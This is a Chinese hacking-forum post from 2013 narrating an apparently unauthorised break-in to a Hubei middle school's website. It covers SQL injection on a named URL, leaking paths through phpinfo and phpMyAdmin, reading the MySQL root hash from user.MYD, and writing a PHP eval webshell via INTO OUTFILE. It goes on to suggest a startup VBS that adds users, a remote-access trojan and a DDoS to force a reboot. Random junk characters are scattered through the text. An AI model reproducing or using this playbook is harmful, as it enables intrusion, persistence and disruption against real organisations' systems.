中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏# E. q; S# J& V! [4 h
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
- l0 \2 M; L; z3 c3 U# F6 s( A' N+ U
. D0 E1 r; L; Y. i
3 g* o% I/ U; W. t1 X' q4 _8 P7 y# Y" b) m( K" `; i% s& ]
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : `5 [1 o8 U. y+ ?7 i7 k

6 Z2 w+ o+ \: ]% B( }) M8 S那么想可以直接写入shell ,getshell有几个条件:
6 I1 h4 ^8 |7 d
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF# M8 W" `8 Q8 v( ]5 C
& q* {% w; ]( l
试着爆绝对路径:
$ x$ U3 u* r; s# E. V6 s1./phpMyAdmin/index.php?lang[]=1  , ?  M5 G4 r8 N% h0 z9 L' d
2./phpMyAdmin/phpinfo.php  
, j* s+ ?' M& r5 i6 j. \3./load_file()  
. a+ [/ R3 n( U/ u% y4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
% S3 N+ [5 q2 K9 ]* g) \5./phpmyadmin/libraries/select_lang.lib.php  
2 c8 n7 l* ~3 S- c! V3 c7 i, P6./phpmyadmin/libraries/lect_lang.lib.php  
- S, s$ [" A1 f0 w$ I1 i+ _9 h" e7./phpmyadmin/libraries/mcrypt.lib.php   ' H$ F. `9 B) O8 w2 }5 R% [4 ~! Z( M
8./phpmyadmin/libraries/export/xls.php  ! E4 u( ^' R! W( a0 b/ W/ x# H
1 D; a1 W1 Y  g2 p
均不行...........................! m( D  o# K& `" F8 }6 q6 G. g

8 W: A7 t* O% F& @! z" l御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php: q' V5 ~1 e/ k( l4 w; M# m

, J" a# g, j9 ~- I/ ]( f, T; q% D权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin   l9 J9 h$ z8 a: @1 q4 C$ C1 g1 e" e
- Y, H; x) f6 u) _
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
" D7 n6 w6 m" J" x# `+ h
# h7 _1 F0 ^# r, K- o敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
+ _& k  I3 K' ]7 t) m+ J1 P" c# O. q+ |
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell   G6 B# J0 f% S4 t) b% j4 ?4 ~
( \3 J( S4 T# _+ i2 n  W0 P
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
" ?$ e+ X+ \6 H3 ^0 t& Y$ z
, L* ?3 S% V2 L; j/ f& X0 y8 o自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! L: R. ~& [& v% A/ l7 r. }( K2 S: P  l
成功读到root密码:
  E9 {2 L" E4 ?! f/ Y3 l: h/ x, y* \$ r1 H1 n% h# ]; A/ a/ L
17---- r(0072)
5 y# u5 u- i. p) m# y2 ~18---- o(006f)! M7 e6 z$ X) B# a( H2 E
19---- o(006f); ~, M  h" F  Q
20---- t(0074)
9 Q% s3 {0 [8 L9 b, C21---- *(002a)
+ I7 L* c  p/ e( }4 a( z6 l22---- 8(0038)
) _  [- f5 l5 w. d( O9 N; H5 R23---- 2(0032)8 T4 m7 R  G$ N! {  y& m
24---- E(0045)
6 N/ S% g! b! a' V) g! b" e  B25---- 1(0031): y" o- g4 ^: l
26---- C(0043)
/ z0 P/ |- S7 q' f! @, @27---- 5(0035)
' A5 j2 N% q( \( X. {" G# ?28---- 8(0038). _+ t" `* g- _& `
29---- 2(0032)2 L3 i6 R* j  X% Y" b2 x7 C
30---- 8(0038)
2 ?  g5 ~3 P6 Y8 R1 I31---- A(0041)$ H( A3 }1 I5 C* A
32---- 9(0039)
3 d; T0 ^. W5 ~# H, A33---- B(0042)7 }: z  }' r( E, M" _
34---- 5(0035)  Y: \7 l  u, U# R) V
35---- 4(0034). i; s! U/ q% o- O
36---- 8(0038)
1 j$ I! ^& o( i5 m/ C' O& [5 h37---- 6(0036)
* `( K' O9 H! G. }: Y3 z38---- 4(0034)
+ h+ y& \2 F3 G5 n, u6 N39---- 9(0039)# O5 F1 ?! S) f  J
40---- 1(0031)
* V$ ?7 ?' S4 [6 y7 N) c41---- 1(0031)
7 l( }9 f- \+ d/ j3 ?42---- 5(0035)
9 i) x9 d6 g5 P$ g+ p43---- 3(0033)4 c% A4 B, l" M  z
44---- 5(0035)
' D: p. E. k, h# q* O" @45---- 9(0039)1 q* k) |' D. V
46---- 8(0038)1 m7 `6 Z2 {1 Z- i  D
47---- F(0046)
) ?! ]0 t, t, v# z48---- F(0046)
1 _; M% b- C+ S, P" s49---- 4(0034)% ?  R6 M- {6 U6 N/ |) [- \( M
50---- F(0046)
8 ?7 e- \* @! ~1 U51---- 0(0030)
1 t, r& n0 H( Y52---- 3(0033)
# ~& T0 q4 I+ P) s. E) P53---- 2(0032)
0 @& x8 P9 E8 c; U+ W6 _$ v$ ^54---- A(0041)7 a! ^6 v8 \$ A$ n$ V
55---- 4(0034)
1 M$ B5 J' ?; @5 k' _4 [56---- A(0041)( A! `& @# a: ]7 p# B# A+ v  w! c
57---- B(0042)
. @6 t( h% q3 A* v58---- *(0044)
5 t% F& \: }- q5 G4 b! B" _) K59---- *(0035)
* {, a, j/ {$ b- p6 ]; c! \; o60---- *(0041)
6 l5 \" X- w; q& v, _( H' |61---- *0032)% @, x( D4 j6 C4 d# Y4 Z- u
( S$ R$ u. ~: t- ~% \6 `4 c
解密后成功登陆phpmyamin; y# J5 G2 ~" I3 d
                          
& k/ W% \  H  b$ t4 L
7 o, q+ X9 S. G) u5 S- D) r4 K# Y8 W: W                             [attach]164[/attach]2 |, w3 s( ^! n3 ?, y6 t

, V+ c1 D. l; }" o+ B找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
. @  I- `! [  u( a* G% H  w# i/ g0 h
4 K9 f0 U, j! b0 l) I成功执行,拿下shell,菜刀连接:5 U! X* E+ I' N; D  C
& f1 Z; W2 w8 O$ k. h' Q( {3 w
服务器不支持asp,aspx,php提权无果...................
1 r5 }, l- O( b" o. ~, \
3 c3 k1 g4 w! J) s但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:" @9 r7 a# w  X, U! \7 {
服务器上已经有个隐藏帐号了
7 ^9 M: e4 X# x% e( P
别名     administrators
% p: B) v: e( g1 l. r注释     管理员对计算机/域有不受限制的完全访问权

) U9 h- I1 J+ `! E! S! j5 I! x
成员

# k, G) Q' |/ L! Q
-------------------------------------------------------------------------------
3 B* p% ~  p. n) k, @# Jadmin
/ ~, W7 H3 A1 ?( t0 OAdministrator7 @2 o  C+ p9 K; e/ y
slipper$
* y  |# d3 B- C' D. e$ f, Zsqluser
+ o( j! c3 O! a8 h/ e3 C命令成功完成。
) A, ?$ ^, ~7 [, C
3 \( |0 L! f/ y& i" m/ F) D服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
+ u/ z/ Q) v6 T; w" t8 c* F; P& r# H9 @
ddos服务器重启,不然就只能坐等服务器重启了...............................
, N% o* ^* @* o3 A) P+ X4 S
/ E  _2 F0 w# ?. `; S5 f# c      
9 x- a$ }3 _, }0 D" t0 @) }

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2